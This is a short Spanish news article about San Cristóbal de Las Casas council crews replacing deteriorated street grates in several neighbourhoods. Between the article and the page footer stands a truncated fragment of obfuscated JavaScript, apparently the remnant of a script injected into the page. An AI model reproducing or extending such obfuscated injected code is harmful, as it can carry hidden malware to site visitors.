Avanzan labores de rehabilitación de rejillas para mejorar la seguridad vial

Yolanda Rodríguez/ corresponsal

1 de mayo del 2025. San Cristóbal de Las Casas.- Con la finalidad de reforzar la seguridad vial y optimizar el estado de las calles, el Ayuntamiento ha iniciado una serie de intervenciones para renovar y reparar rejillas en diversas zonas del municipio.

Según informó Cinthia Nayely Gutiérrez Urbina, directora de Obras Públicas Municipales, las acciones se concentran en la sustitución de rejillas de herrería y concreto que presentan deterioro. Los trabajos se están llevando a cabo principalmente en el centro histórico y en colonias como Santa Lucía, Zona Centro, Ramón Corona, Sostenes Esponda, San Ramón, así como en la zona sur, a lo largo de la Avenida de la Juventud.

La funcionaria destacó que estas nuevas estructuras son fabricadas por el personal del propio Ayuntamiento, siguiendo especificaciones técnicas que garantizan mayor resistencia y durabilidad. Asimismo, exhortó a la población a colaborar reportando cualquier alcantarilla o rejilla en mal estado, a fin de atender oportunamente estos puntos y contribuir al mejoramiento continuo de la infraestructura urbana.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Un auto destrozado para frenar la imprudencia en la carretera de cuota

YolandaRodríguez/ corresponsal San Cristóbal de Las Casas, 02 de enero de 2026.– Un vehículo siniestrado …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *